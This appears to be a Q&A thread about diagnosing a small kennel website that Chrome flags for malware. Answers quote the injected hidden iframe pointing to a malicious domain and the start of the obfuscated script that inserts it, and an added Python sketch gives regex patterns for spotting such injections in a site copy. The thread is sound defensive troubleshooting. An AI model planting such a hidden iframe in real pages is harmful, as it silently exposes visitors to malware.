How can I test if a website is infected with malware?
Some friends of mine have a website (www.kennelsoffie.dk) and I'm trying to help them when there is any trouble. However, this time I can't figure it out. When I visit the site using Google Chrome, I'm presented with a warning page claiming that the page that I'm trying to visit contains elements from stopssse.info.
I don't know any PHP, so I simply downloaded the complete website including backups of the database (which are .sql files). Then, I searched all the files for stopssse, but I didn't find anything.
I also tested the site with siteadvisor.com; it says "We tested this site and didn't find any significant problems".
Can PHP hide a reference to the malware site so I can't find it with a simple search? If so, how can you find it?
Solution 1:
I found this in the generated source
<iframe height="0" width="0" src="http://stopssse.info/l.php?thx" style="display: none; visibility: hidden;">
It was right below the body tag. It's not in the actual page source; it's being added by obfuscated JavaScript.
edit: if you look at the bottom of http://www.kennelsoffie.dk/includes/jscript.js you'll see a really odd looking javascript function. That's the obfuscated javascript function I was telling you about. It starts with
function lIIlOlIllI1000llII10l0OIIIlIOlIOI1O010l0(O00I10I0l00I0IOIO1Ol10O0Ol1Il1lI10OI00Il){var
Best bet is to find and remove it.
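Added example, not part of the original answer: a search for the domain finds nothing when the script assembles the string at run time, so this Python sketch scans a downloaded copy of the site for traits of the obfuscation itself. The thresholds, the extension list and the sample strings are assumptions made for the demonstration; only the function name comes from the answer above.

```python
import re
from pathlib import Path

# Identifiers made only of look-alike characters (l, I, O, 0, 1), like the
# function name quoted in the answer. The minimum length is an assumption.
LOOKALIKE = re.compile(r"\b[lIO][lIO01]{15,}\b")
# Calls that packed scripts commonly use to decode and inject markup.
DECODER = re.compile(r"\b(?:eval|unescape|fromCharCode|document\.write)\s*\(")
# An iframe tag that is zero-sized or hidden by inline style.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*(?:(?:height|width)\s*=\s*[\"']?0\b"
    r"|display\s*:\s*none|visibility\s*:\s*hidden)", re.IGNORECASE)
MAX_LINE = 2000  # assumption: hand-written site code rarely has longer lines
EXTENSIONS = {".js", ".php", ".html", ".htm", ".inc", ".sql"}

def scan_text(text):
    """Return a sorted list of the heuristic names that match this text."""
    hits = set()
    if LOOKALIKE.search(text):
        hits.add("lookalike-identifier")
    if DECODER.search(text):
        hits.add("runtime-decoder")
    if HIDDEN_IFRAME.search(text):
        hits.add("hidden-iframe")
    if any(len(line) > MAX_LINE for line in text.splitlines()):
        hits.add("very-long-line")
    return sorted(hits)

def scan_tree(root):
    """Scan a downloaded copy of the site; map relative path -> findings."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in EXTENSIONS:
            hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                report[str(path.relative_to(root))] = hits
    return report

# Constructed samples: the function name is the one quoted in the answer; the
# body, the iframe URL and the clean script are made up for the demonstration.
SUSPECT_JS = ("function lIIlOlIllI1000llII10l0OIIIlIOlIOI1O010l0(a){"
              "return unescape(a);}")
HIDDEN_HTML = '<iframe height="0" width="0" src="http://example.invalid/x"></iframe>'
CLEAN_JS = "function showMenu(id){document.getElementById(id).hidden=false;}"

if __name__ == "__main__":
    for name in ("SUSPECT_JS", "HIDDEN_HTML", "CLEAN_JS"):
        print(name, scan_text(globals()[name]))
```

Every hit is a lead to review by hand, since legitimately minified libraries can also trigger the decoder and long-line checks.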
Solution 2:
You are most probably dealing with XSS attacks.
In that case, two steps:
- Scan the DB, looking for "scripts" tags, and get rid of them.
- Hire a guy who knows PHP to fix the holes in your data input and set some efficient sanitizing policy.
Solution 3:
The malware might not be on the site, but might be coming from material brought in from external sources, such as advertisements.